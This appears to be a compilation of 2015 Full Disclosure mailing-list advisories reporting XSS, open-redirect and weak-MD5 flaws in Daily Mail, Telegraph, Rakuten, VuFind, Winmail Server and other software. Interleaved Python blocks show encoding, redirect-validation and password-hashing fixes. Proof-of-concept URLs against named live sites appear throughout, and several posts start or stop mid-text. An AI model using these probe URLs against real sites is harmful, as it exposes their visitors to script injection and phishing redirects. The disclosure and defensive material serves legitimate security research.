[FD] Daily Mail Registration Page Unvalidated Redirects and Forwards & XSS Web Security Problem

2015-11-02 Thread Jing Wang
an exploit it by XSS attacks.

The vulnerability occurs at "reportAbuseInComment.html?" page with
"&commentId" parameter, i.e.
http://www.dailymail.co.uk/home/reportAbuseInComment.html?articleId=346288&commentId=877038


POC Code:
http://www.dailymail.co.uk/home/reportAbuseInComment.html?articleId=346288&commentId=";>


The vulnerability can be attacked without user login. Tests were performed
on Mozilla Firefox (34.0) in Ubuntu (14.04) and Microsoft IE (9.0.15) in
Windows 7.



*POC Video:*
https://www.youtube.com/watch?v=Oig-ZrlJDf8&feature=youtu.be



*Blog Detail:*
http://tetraph.com/security/web-security/daily-mail-xss-bug/
http://securityrelated.blogspot.com/2015/10/daily-mail-online-website-xss-cyber.html


*(2.2) What is XSS?*
"Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications. XSS enables attackers to inject
client-side script into web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same-origin policy. Cross-site scripting carried out on
websites accounted for roughly 84% of all security vulnerabilities
documented by Symantec as of 2007. Their effect may range from a petty
nuisance to a significant security risk, depending on the sensitivity of
the data handled by the vulnerable site and the nature of any security
mitigation implemented by the site's owner." (Wikipedia)




*(2.3) Vulnerability Disclosure:*
This vulnerability has been patched.




Blog Details:
http://tetraph.com/security/website-test/daily-mail-open-redirect-xss/
http://securityrelated.blogspot.com/2015/10/daily-mail-url-redirection-and-xss-bug.html


--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber Attacks

2015-11-02 Thread Jing Wang
*TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber
Attacks*


*Website Description:*
http://www.telegraph.co.uk


"The Daily Telegraph is a British daily morning English-language broadsheet
newspaper, published in London by Telegraph Media Group and distributed
throughout the United Kingdom and internationally. The newspaper was
founded by Arthur B. Sleigh in June 1855 as The Daily Telegraph and
Courier, and since 2004 has been owned by David and Frederick Barclay. It
had a daily circulation of 523,048 in March 2014, down from 552,065 in
early 2013. In comparison, The Times had an average daily circulation of
400,060, down to 394,448. The Daily Telegraph has a sister paper, The
Sunday Telegraph, that was started in 1961, which had circulation of
418,670 as of March 2014. The two printed papers currently are run
separately with different editorial staff, but there is cross-usage of
stories. News articles published in either, plus online Telegraph articles,
may also be published on the Telegraph Media Group's www.telegraph.co.uk
website, all under The Telegraph title." (From Wikipedia)




Discovered and Disclosed By:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing


*(1) Vulnerability Description:*
Telegraph has a Web security bug problem. It is vulnerable to XSS attacks.
In fact, all its photo pages are vulnerable to XSS (Cross-Site Scripting)
vulnerabilities. Telegraph's picture pages use "&frame" as their parameter.
All its web pages that use "&frame" are vulnerable to the bugs. Those
vulnerabilities have been patched now.


*Examples of Vulnerable Links:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278



*POC Code:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095";>
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162";>
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280";>
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790";>
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278";>


The vulnerability can be attacked without user login. Tests were performed
on Firefox (37.02) in Ubuntu (14.04) and IE (8.0.7601) in Windows 7. The
bugs were found by using CSXDS.




*(2) XSS Description:*
The description of XSS is: "Cross-Site Scripting (XSS) attacks are a type
of injection, in which malicious scripts are injected into otherwise benign
and trusted web sites. XSS attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a
user within the output it generates without validating or encoding it."
(OWASP)




*POC Video:*
https://www.youtube.com/watch?v=SqjlabJ1OzA&feature=youtu.be


*Blog Details:*
http://www.tetraph.com/security/website-test/telegraph-xss/
http://securityrelated.blogspot.com/2015/10/telegraph-xss-0day.html


*(3) Vulnerability Disclosure:*
These vulnerabilities have been patched now.


--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

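The POC URLs in the Telegraph and Daily Mail posts above end in the probe `";>`: a quote to close the attribute the parameter is echoed into, then `>` to close the tag. The following is an added example (not code from the advisory or from either site) that models a gallery page echoing its "frame" parameter into an href attribute and shows, with that probe, the vulnerable rendering beside the attribute-encoded one; the template and function names are constructed for the example.

```python
"""Attribute-context reflection: vulnerable vs. encoded rendering.

Added example, not code from the advisory or from the sites it names. It
models a gallery page that echoes its "frame" query parameter into an HTML
attribute, and uses the advisory's own probe  ";>  to show the difference.
"""
import html
import re

# The probe visible in the advisory's POC URLs: a quote to close the attribute,
# then '>' to close the tag. (The markup that followed it was stripped in the post.)
PROBE = '";>'


def render_unsafe(frame: str) -> str:
    """Vulnerable: the raw parameter is concatenated into the href attribute."""
    return '<a class="next" href="gallery.html?frame=' + frame + '">Next</a>'


def render_safe(frame: str) -> str:
    """Hardened: the parameter is entity-encoded for the attribute context."""
    encoded = html.escape(frame, quote=True)  # '"' -> &quot;  '>' -> &gt;
    return '<a class="next" href="gallery.html?frame=' + encoded + '">Next</a>'


def attribute_value(markup: str, attr: str = "href") -> str:
    """The raw value a browser assigns to attr: everything up to the next '"'."""
    m = re.search(attr + r'="([^"]*)"', markup)
    return m.group(1) if m else ""


def breaks_out(markup: str, frame: str, attr: str = "href") -> bool:
    """True when the reflected value terminated the attribute early, i.e. the
    rest of the probe landed in tag/markup context instead of the attribute.
    The attribute is decoded first, so an encoded (safe) value compares equal."""
    return html.unescape(attribute_value(markup, attr)) != "gallery.html?frame=" + frame


def reflected_verbatim(body: str, value: str) -> bool:
    """Scanner-style check: the parameter value appears in the response
    unencoded. This is the signal a reflected-XSS scanner keys on."""
    return value in body
```

Run `breaks_out(render_unsafe(PROBE), PROBE)` against `breaks_out(render_safe(PROBE), PROBE)` to see the attribute boundary move only in the unencoded rendering.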


[FD] VuFind 1.0 Web Application Reflected XSS (Cross-site Scripting) 0-Day Bug Security Issue

2015-09-25 Thread Jing Wang
*VuFind 1.0 Web Application Reflected XSS (Cross-site Scripting) 0-Day
Bug Security Issue*



Exploit Title: VuFind Results? &lookfor parameter Reflected XSS Web
Security Vulnerability
Product: VuFind
Vendor: VuFind
Vulnerable Versions: 1.0
Tested Version: 1.0
Advisory Publication: September 20, 2015
Latest Update: September 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discoverer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)


*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
VuFind



*Product & Vulnerable Versions:*
VuFind
1.0



*Vendor URL & Download:*
Product can be obtained from here,
http://sourceforge.net/p/vufind/news/




*Product Introduction Overview:*
"VuFind is a library resource portal designed and developed for libraries
by libraries. The goal of VuFind is to enable your users to search and
browse through all of your library's resources by replacing the traditional
OPAC to include: Catalog Records, Locally Cached Journals, Digital Library
Items, Institutional Repository, Institutional Bibliography, Other Library
Collections and Resources. VuFind is completely modular so you can
implement just the basic system, or all of the components. And since it's
open source, you can modify the modules to best fit your need or you can
add new modules to extend your resource offerings. VuFind runs on Solr
Energy. Apache Solr, an open source search engine, offers amazing
performance and scalability to allow for VuFind to respond to search
queries in milliseconds time. It has the ability to be distributed if you
need to spread the load of the catalog over many servers or in a server
farm environment. VuFind is offered for free through the GPL open source
license. This means that you can use the software for free. You can modify
the software and share your successes with the community! Take a look at
our VuFind Installations Wiki page to see how a variety of organizations
have taken advantage of VuFind's flexibility. If you are already using
VuFind, feel free to edit the page and share your accomplishments. "






*(2) Vulnerability Details:*
VuFind web application has a computer security problem. Hackers can exploit
it by reflected XSS cyber attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.

Several other similar products' 0-day vulnerabilities have been found by
some other bug researchers before. VuFind has patched some of them. "scip
AG was founded in 2002. We are driven by innovation, sustainability,
transparency, and enjoyment of our work. We are completely self-funded and
are thus in the comfortable position to provide completely independent and
neutral services. Our staff consists of highly specialized experts who
focus on the topic information security and continuously further their
expertise through advanced training".


*(2.1)* The code flaw occurs at "lookfor?" parameter in
"/vufind/Resource/Results?" page.

Some other researcher has reported a similar vulnerability here and VuFind
has patched it.
https://vufind.org/jira/si/jira.issueviews:issue-html/VUFIND-54/VUFIND-54.html







*(3) Solution:*
Update to new version.


*References:*
http://tetraph.com/security/xss-vulnerability/vufind-xss/
http://securityrelated.blogspot.com/2015/09/vufind-xss.html
https://vulnerabilitypost.wordpress.com/2015/09/22/vufind-xss/
http://tetraph.blog.163.com/blog/static/234603051201582525130175/
https://packetstormsecurity.com/files/133374/Winmail-Server-4.2-Cross-Site-Scripting.html
http://marc.info/?l=oss-security&m=144094021709472&w=4
http://lists.openwall.net/full-disclosure/2015/08/31/2
http://ithut.tumblr.com/post/128012509383/webcabinet-winmail-server-42-reflected-xss
http://seclists.org/fulldisclosure/2015/Aug/84


--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] Winmail Server 4.2 Reflected XSS (Cross-site Scripting) Web Application 0-Day Security Bug

2015-08-30 Thread Jing Wang
*Winmail Server 4.2 Reflected XSS (Cross-site Scripting) Web Application
0-Day Security Bug*



Exploit Title: Winmail Server badlogin.php &lid parameter Reflected XSS Web
Security Vulnerability
Product: Winmail Server
Vendor: Winmail Server
Vulnerable Versions: 4.2, 4.1
Tested Version: 4.2, 4.1
Advisory Publication: August 24, 2015
Latest Update: August 30, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discoverer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)


*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Winmail Server



*Product & Vulnerable Versions:*
Winmail Server
4.2, 4.1



*Vendor URL & Download:*
Product can be obtained from here,
http://www.magicwinmail.net/download.asp




*Product Introduction Overview:*
"Winmail Server is an enterprise class mail server software system offering
a robust feature set, including extensive security measures. Winmail Server
supports SMTP, POP3, IMAP, Webmail, LDAP, multiple domains, SMTP
authentication, spam protection, anti-virus protection, SSL security,
Network Storage, remote access, Web-based administration, and a wide array
of standard email options such as filtering, signatures, real-time
monitoring, archiving, and public email folders. Winmail Server can be
configured as a mail server or gateway for ISDN, ADSL, FTTB and cable modem
networks, beyond standard LAN and Internet mail server configurations."


*(2) Vulnerability Details:*
Winmail Server web application has a computer security problem. Hackers can
exploit it by reflected XSS cyber attacks. This may allow a remote attacker
to create a specially crafted request that would execute arbitrary script
code in a user's browser session within the trust relationship between
their browser and the server.

Several other similar products' 0-day vulnerabilities have been found by
some other bug hunter researchers before. Winmail Server has patched some
of them. "scip AG was founded in 2002. We are driven by innovation,
sustainability, transparency, and enjoyment of our work. We are completely
self-funded and are thus in the comfortable position to provide completely
independent and neutral services. Our staff consists of highly specialized
experts who focus on the topic information security and continuously
further their expertise through advanced training". Scip has recorded
similar XSS bugs, such as scipID 26980.



*(2.1)* The code flaw occurs at "&lid" parameter in "badlogin.php" page. In
fact, CVE-2005-3692 mentions that "&retid" parameter in "badlogin.php" page
is vulnerable to XSS attacks. But it does not mention "&lid" parameter.
The scipID of the bug is 26980. Bugtraq (SecurityFocus) ID is 15493. OSVDB
ID is 20926.


*References:*
http://tetraph.com/security/xss-vulnerability/winmail-server-4-2-reflected-xss/
http://securityrelated.blogspot.com/2015/08/winmail-server-42-reflected-xss.html
http://seclists.org/fulldisclosure/2015/May/103
http://marc.info/?l=full-disclosure&m=143110916812709&w=4
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2028
http://webtech.lofter.com/post/1cd3e0d3_6eef8c8
http://whitehatpost.blog.163.com/blog/static/242232054201573091630996/
https://hackertopic.wordpress.com/2015/08/25/winmail-server-4-2-reflected-xss/
http://whitehatview.tumblr.com/post/118853357881/tetraph-cve-2014-9468-instantasp
http://marc.info/?l=full-disclosure&m=142649827629327&w=4
https://packetstormsecurity.com/files/132029/SITEFACT-CMS-2.01-Cross-Site-Scripting.html


--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] KnowledgeTree OSS 3.0.3b Reflected XSS (Cross-site Scripting) Web Application 0-Day Security Bug

2015-08-30 Thread Jing Wang
*KnowledgeTree OSS 3.0.3b Reflected XSS (Cross-site Scripting) Web
Application 0-Day Security Bug*



Exploit Title: KnowledgeTree login.php &errorMessage parameter Reflected
XSS Web Security Vulnerability
Product: Knowledge Tree Document Management System
Vendor: Knowledge Inc
Vulnerable Versions: OSS 3.0.3b
Tested Version: OSS 3.0.3b
Advisory Publication: August 22, 2015
Latest Update: August 31, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discoverer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)


*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
KnowledgeTree



*Product & Vulnerable Versions:*
Knowledge Tree Document Management System
OSS 3.0.3b



*Vendor URL & Download:*
Product can be obtained from here,
http://download.cnet.com/KnowledgeTree-Document-Management-System/3000-10743_4-10632972.html
http://www.knowledgetree.com/




*Product Introduction Overview:*
"KnowledgeTree is open source document management software designed for
business people to use and install. Seamlessly connect people, ideas, and
processes to satisfy all your collaboration, compliance, and business
process requirements. KnowledgeTree works with Microsoft® Office®,
Microsoft® Windows® and Linux®."


*(2) Vulnerability Details:*
KnowledgeTree web application has a computer security problem. Hackers can
exploit it by reflected XSS cyber attacks. This may allow a remote attacker
to create a specially crafted request that would execute arbitrary script
code in a user's browser session within the trust relationship between
their browser and the server.

Several other similar products' 0-day vulnerabilities have been found by
some other bug hunter researchers before. KnowledgeTree has patched some of
them. "Bugtraq is an electronic mailing list dedicated to issues about
computer security. On-topic issues are new discussions about
vulnerabilities, vendor security-related announcements, methods of
exploitation, and how to fix them. It is a high-volume mailing list, and
almost all new vulnerabilities are discussed there.". It has listed similar
exploits, such as Bugtraq (Security Focus) 32920.



*(2.1)* The code flaw occurs at "&errorMessage" parameter in "login.php"
page.

One similar bug is CVE-2008-5858. Its X-Force ID is 47529.


*References:*
http://tetraph.com/security/xss-vulnerability/knowledgetree-oss-3-0-3b-reflected-xss/
http://securityrelated.blogspot.com/2015/08/knowledgetree-oss-303b-reflected-xss.html
http://seclists.org/fulldisclosure/2015/May/31
https://progressive-comp.com/?l=full-disclosure&m=143110966112898&w=1
https://packetstormsecurity.com/files/132927/PhotoPost-PHP-4.8c-Cross-Site-Scripting.html
http://whitehatpost.blog.163.com/blog/static/242232054201573084141976/
https://hackertopic.wordpress.com/2015/08/22/knowledgetree-oss-3-0-3b-reflected-xss/
http://lists.openwall.net/full-disclosure/2015/03/10/5
http://marc.info/?l=full-disclosure&m=143251239323317&w=4
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01415.html


--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] PhotoPost PHP 4.8c Cookie Based Stored XSS (Cross-site Scripting) Web Application 0-Day Bug

2015-07-31 Thread Jing Wang
uke
PostNuke
Mambo
XMB Forums

(Src:
http://www.photopost.com/sites_frame.pl?http://www.photopost.com/photopost/adm-index.php
)


*References:*
http://tetraph.com/security/xss-vulnerability/photopost-php/
http://securityrelated.blogspot.com/2015/07/photopost-php-48c-cookie-based-stored.html
https://progressive-comp.com/?l=full-disclosure&m=142649827629327&w=1
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01901.html
https://vulnerabilitypost.wordpress.com/2015/07/27/photopost-php/
http://tetraph.blog.163.com/blog/static/234603051201563055350773/
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1817
http://www.inzeed.com/kaleidoscope/xss-vulnerability/rakuten-website-xss/
http://seclists.org/fulldisclosure/2015/Mar/56
http://lists.openwall.net/full-disclosure/2015/03/07/4


--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] FC2 & Rakuten Online Websites Multiple XSS (Cross-site Scripting) and Open Redirect Cyber Vulnerabilities

2015-06-11 Thread Jing Wang
erabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!"
A great many of the following web security issues have been published here:
Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL
injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated
Redirects and Forwards, Information Leakage, Denial of Service, File
Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML
Injection, Spam.


The program code flaw can be attacked without user login. Tests were
performed on Microsoft IE 9 (9.0.8112.16421) on Windows 7, Mozilla Firefox
(37.0.2) & Google Chromium 42.0.2311 (64-bit) on Ubuntu (14.04.2), and Apple
Safari 6.1.6 on Mac OS X v10.9 Mavericks.


Since I know only a little Japanese, I am not sure whether Rakuten pays much
attention to Open Redirect Vulnerabilities or not.





*(2.2.2)* Use one of the webpages for the following tests. The webpage
address is "http://www.inzeed.com/kaleidoscope/". We can suppose that this
webpage is malicious.



Vulnerable URL 1:
http://account.rakuten-sec.co.jp/cgi-bin/btracking?URL=https://www.netflix.com/movies/

POC Code:
http://account.rakuten-sec.co.jp/cgi-bin/btracking?URL=http://www.inzeed.com/kaleidoscope/




Vulnerable URL 2:
http://affiliate.rakuten.com/fs-bin/click?u1=no_refer&id=Jv*v1/Wldzg&subid=0&offerid=229300.1&type=10&tmpid=6933&RD_PARM1=http%3A%2F%2Fadcash.com%2fmoney

POC Code:
http://affiliate.rakuten.com/fs-bin/click?u1=no_refer&id=Jv*v1/Wldzg&subid=0&offerid=229300.1&type=10&tmpid=6933&RD_PARM1=http://www.inzeed.com/kaleidoscope/




Vulnerable URL 3:
http://clickfrom.rakuten.com/default.asp?adid=17379&sURL=http%3A%2F%2Fwww.craigslist.org

POC Code:
http://clickfrom.rakuten.com/default.asp?sURL=http://www.inzeed.com/kaleidoscope/






*POC Video:*
https://www.youtube.com/watch?v=uxsuLgAdpCw


*Blog Detail:*
http://tetraph.com/security/open-redirect/rakuten-open-redirect/
http://securityrelated.blogspot.com/2015/06/rakuten-open-redirect.html





*(2.2.3) Vulnerability Disclosure:*
Those vulnerabilities are not patched now.


*More Details:*
http://tetraph.com/security/web-security/fc2-rakuten-xss-and-url-redirection/
http://securityrelated.blogspot.com/2015/06/fc2-rakuten-online-websites-multiple.html


--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

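The three Rakuten endpoints in the post above (btracking?URL=, click?RD_PARM1= and default.asp?sURL=) all take a destination from a query parameter and redirect to it unchecked. The following is an added example, not Rakuten's code, of the check such an endpoint needs: the destination is accepted only when its host is on an allowlist the site owner maintains, and the usual ways of smuggling an outside host past a naive prefix check are rejected. The allowlist hosts and function names are constructed for the example.

```python
"""Redirect-target validation for a tracking/redirect endpoint.

Added example, not code from Rakuten or the advisory. Destinations are
accepted only for hosts on ALLOWED_HOSTS (constructed values); everything
else falls back to a fixed landing page instead of being redirected to.
"""
from typing import Iterable, Optional
from urllib.parse import urlsplit, urlunsplit

# Constructed allowlist for the example; a deployment would load this from config.
ALLOWED_HOSTS = {"www.example-shop.test", "account.example-shop.test"}
FALLBACK = "https://www.example-shop.test/"


def safe_redirect_target(raw: str, allowed_hosts: Iterable[str] = ALLOWED_HOSTS) -> Optional[str]:
    """Return a normalized absolute URL if raw points at an allowed host, else None."""
    if not raw or any(ch in raw for ch in "\r\n\x00"):
        return None                        # CR/LF/NUL must never reach a Location header
    candidate = raw.strip().replace("\\", "/")   # browsers treat '\' as '/' in the authority
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ("http", "https"):
        return None                        # also rejects scheme-relative "//host" (empty scheme)
    if parts.username or parts.password:
        return None                        # "https://allowed-host@evil" style userinfo tricks
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in set(allowed_hosts):
        return None                        # includes "allowed-host.evil" and bare "https:evil"
    # Rebuild from parsed parts: lower-cased scheme/host, no fragment, "/" if no path.
    return urlunsplit((parts.scheme.lower(), parts.netloc.lower(), parts.path or "/", parts.query, ""))


def redirect_or_fallback(raw: str, fallback: str = FALLBACK) -> str:
    """What the endpoint should put in Location: the validated target or the fallback."""
    target = safe_redirect_target(raw)
    return target if target is not None else fallback
```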

[FD] 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities

2015-06-11 Thread Jing Wang
*6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities*


Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1, v8.0
Tested Version: v7.1, v8.0
Advisory Publication: June 08, 2015
Latest Update: June 10, 2015
Vulnerability Type: Inadequate Encryption Strength [CWE-326]
CVE Reference: *
CVSS Severity (version 2.0):
Discoverer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)


*Recommendation Details:*


*(1) Vendor & Product Description:*


Vendor:
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be obtained from here,
http://www.6kbbs.com/download.html




*Product Introduction Overview:*
"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions. Forum Technical realization (a) interface: using XHTML + CSS
structure, so the structure of the page, easy to modify the interface;
save the transmission static page code, greatly reducing the amount of
data transmitted over the network; improve the interface scalability,
more in line with WEB standards, support Internet Explorer, FireFox, Opera
and other major browsers. (b) Program: The ASP + ACCESS mature technology,
the installation process is extremely simple, the environment is also
very common."


"(1) PHP version: (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b)
Currently (July 2010) is still in the testing phase, 6kbbs V8.0 is the
latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent
community forum process. The program is simple but not simple; fast,
small; interface generous and good scalability; functional and practical.
pursue superiority, good interface, practical functions of choice for
subscribers."





*(2) Vulnerability Details:*
6kbbs web application has a computer security problem. It can be exploited
by weak encryption attacks. The software stores or transmits sensitive data
using an encryption scheme that is theoretically sound, but is not strong
enough for the level of protection required. A weak encryption scheme can
be subjected to brute force attacks that have a reasonable chance of
succeeding using current attack methods and resources.


Several 6kbbs products' 0-day web cyber bugs have been found by some other
bug hunter researchers before. 6kbbs has patched some of them. "The Full
Disclosure mailing list is a public forum for detailed discussion of
vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!"
A great many of the web securities have been published here.




Source Code:
<?php
// Fragment of convert/discuz72/loginext.php as quoted in the post. The start
// of the first statement is cut off in the post; "$extrow = $db->" is
// reconstructed here from how $extrow and $db are used below.
$extrow = $db->row_select_one("users", "username='{$username}'");
if (!empty($extrow) && !empty($extrow['salt'])) {
    // Discuz-style check: md5(md5(password) . salt) against the stored value.
    if (md5(md5($userpass) . $extrow['salt']) == $extrow['userpass']) {
        $row = $extrow;
        // $userpass_encrypt is set earlier in the file (not shown in the post):
        // the record is rewritten in 6kbbs's own form and the salt is dropped.
        $new_row["userpass"] = $userpass_encrypt;
        $new_row["salt"] = "";
        $db->row_update("users", $new_row, "id={$extrow['id']}");
    }
}
// (A further closing brace in the quoted fragment belongs to an enclosing
// block that the post does not show.)
?>



Source Code From:
http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16


We can see that the "userpass" value stored in the cookie was encrypted using
the "$userpass" user password directly. And there is no "HttpOnly" attribute
at all. Since md5 is used for the encryption, it is easy for hackers to break
the encrypted message.


"The MD5 message-digest cryptography algorithm is a widely used
cryptographic hash function producing a 128-bit (16-byte) hash value,
typically expressed in text format as a 32 digit hexadecimal number. Papers
about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile,
researchers focusing on it spread in Computer Science, Computer
Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety
of cryptographic applications, and is also commonly used to verify data
integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier
hash function, MD4. The source code in RFC 1321 contains a "by attribution"
RSA license." (Wikipedia)


*References:*
http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/
http://securityrelated.blogspot.com/2015/06/6kbbs-v80-
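The 6kbbs post above describes two defects together: the cookie value is derived from the password alone (unsalted MD5, so it is the same on every login and reusable if stolen), and the cookie lacks HttpOnly. The following is an added example, not 6kbbs code: the weak_* functions reproduce the scheme as the post describes it and as the quoted loginext.php checks it, and the remaining functions show the replacement a maintainer would want, a salted slow hash (PBKDF2) for storage and a random session token, kept server-side only as a hash, in an HttpOnly cookie. The in-memory session store and the function names are constructed for the example.

```python
"""Credential handling: the 6kbbs scheme beside a hardened replacement.

Added example, not 6kbbs code. weak_* reproduces the scheme in the advisory
(cookie = md5(password); stored check = md5(md5(password) . salt)). The rest
is the replacement: PBKDF2 with a random per-user salt, and a random session
token that is stored only as a SHA-256 hash and sent in an HttpOnly cookie.
"""
import hashlib
import hmac
import os
import secrets
from typing import Dict, Optional, Tuple

# --- The advisory's scheme ---------------------------------------------------

def weak_cookie_value(password: str) -> str:
    """Cookie "userpass" as the post describes it: unsalted MD5 of the password.
    Same password -> same value on every login, so a stolen cookie is a
    standing credential and a fast offline target."""
    return hashlib.md5(password.encode()).hexdigest()


def weak_stored_value(password: str, salt: str) -> str:
    """Stored form from the quoted loginext.php: md5(md5(password) . salt).
    The inner term is exactly the cookie value above."""
    return hashlib.md5((weak_cookie_value(password) + salt).encode()).hexdigest()


def weak_verify(password: str, salt: str, stored: str) -> bool:
    """The quoted check, as a plain (non-constant-time) string compare."""
    return weak_stored_value(password, salt) == stored


# --- Hardened replacement ----------------------------------------------------

PBKDF2_ROUNDS = 200_000  # tune so one verification costs ~100 ms on the server


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, deliberately slow hash; the record carries its own parameters
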